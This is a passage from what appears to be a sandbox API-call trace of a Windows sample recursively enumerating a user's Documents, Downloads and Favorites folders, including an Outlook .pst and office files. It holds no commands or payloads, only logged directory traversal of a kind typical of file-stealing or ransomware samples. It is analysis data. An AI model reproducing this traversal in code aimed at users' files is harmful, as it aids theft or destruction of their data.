Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0184.342] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.342] lstrlenW (lpString="My Shapes") returned 9 [0184.342] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.347] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.347] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.347] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.347] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.348] lstrlenW (lpString="desktop.ini") returned 11 [0184.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x6fd630 | out: lpFindFileData=0x6fd630*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebda0 [0184.377] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6fd630 | out: lpFindFileData=0x6fd630*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.377] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.377] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6fd630 | out: lpFindFileData=0x6fd630*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0184.377] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.377] lstrlenW (lpString="folder.ico") returned 10 [0184.377] FindClose (in: hFindFile=0x6ebda0 | out: hFindFile=0x6ebda0) returned 1 [0184.377] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd630 | out: hHeap=0x6b0000) returned 1 [0184.377] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0184.378] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.378] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcaf8 | out: hHeap=0x6b0000) returned 1 [0184.378] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0184.378] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.378] lstrlenW (lpString="My Videos") returned 9 [0184.378] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x6fcaf8 | out: lpFindFileData=0x6fcaf8*(dwFileAttributes=0x6fd630, ftCreationTime.dwLowDateTime=0x6fd398, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0184.378] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcaf8 | out: hHeap=0x6b0000) returned 1 [0184.378] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c05e480, ftCreationTime.dwHighDateTime=0x1d5e2d3, ftLastAccessTime.dwLowDateTime=0xadd51f00, ftLastAccessTime.dwHighDateTime=0x1d5da97, ftLastWriteTime.dwLowDateTime=0xadd51f00, ftLastWriteTime.dwHighDateTime=0x1d5da97, nFileSizeHigh=0x0, nFileSizeLow=0x14f9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nKOCE-puVSIk.odt", cAlternateFileName="NKOCE-~1.ODT")) returned 1 [0184.378] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.378] lstrlenW (lpString="nKOCE-puVSIk.odt") returned 16 [0184.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x6fd630 | out: lpFindFileData=0x6fd630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.379] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6fd630 | out: lpFindFileData=0x6fd630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.379] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.379] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6fd630 | out: lpFindFileData=0x6fd630*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0184.379] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.379] lstrlenW (lpString="voeimd@djhreuu.uhd.pst") returned 22 [0184.379] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.379] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fd630 | out: hHeap=0x6b0000) returned 1 [0184.379] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2da960, ftCreationTime.dwHighDateTime=0x1d5dd86, ftLastAccessTime.dwLowDateTime=0xd9b56f0, ftLastAccessTime.dwHighDateTime=0x1d587a7, ftLastWriteTime.dwLowDateTime=0xd9b56f0, ftLastWriteTime.dwHighDateTime=0x1d587a7, nFileSizeHigh=0x0, nFileSizeLow=0x8008, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="plyG9QJwRBkGJv.docx", cAlternateFileName="PLYG9Q~1.DOC")) returned 1 [0184.379] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.380] lstrlenW (lpString="plyG9QJwRBkGJv.docx") returned 19 [0184.380] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.380] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee820 | out: hHeap=0x6b0000) returned 1 [0184.380] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0184.380] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.380] lstrlenW (lpString="Downloads") returned 9 [0184.380] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.381] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.381] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.381] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.381] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.381] lstrlenW (lpString="desktop.ini") returned 11 [0184.381] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.381] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ee820 | out: hHeap=0x6b0000) returned 1 [0184.381] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0184.381] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.381] lstrlenW (lpString="Favorites") returned 9 [0184.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.381] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.381] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.381] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.381] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.381] lstrlenW (lpString="desktop.ini") returned 11 [0184.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.382] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="..", cAlternateFileName="")) returned 1 [0184.382] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.382] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.382] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.382] lstrlenW (lpString="desktop.ini") returned 11 [0184.382] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.382] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.382] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0184.382] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.382] lstrlenW (lpString="Microsoft Websites") returned 18 [0184.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.417] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="..", cAlternateFileName="")) returned 1 [0184.417] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.417] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0184.417] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.417] lstrlenW (lpString="IE Add-on site.url") returned 18 [0184.418] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.419] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.419] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0184.419] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.419] lstrlenW (lpString="MSN Websites") returned 12 [0184.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.461] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="..", cAlternateFileName="")) returned 1 [0184.461] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.461] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0184.461] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.461] lstrlenW (lpString="MSN Autos.url") returned 13 [0184.462] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.462] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6edb70 | out: hHeap=0x6b0000) returned 1 [0184.462] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6ee820 | out: lpFindFileData=0x6ee820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0184.462] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.462] lstrlenW (lpString="Windows Live") returned 12 [0184.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.466] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa918abd8, dwReserved1=0x80fa7eba, cFileName="..", cAlternateFileName="")) returned 1 [0184.466] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.479] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6edb70 | out: lpFindFileData=0x6edb70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, 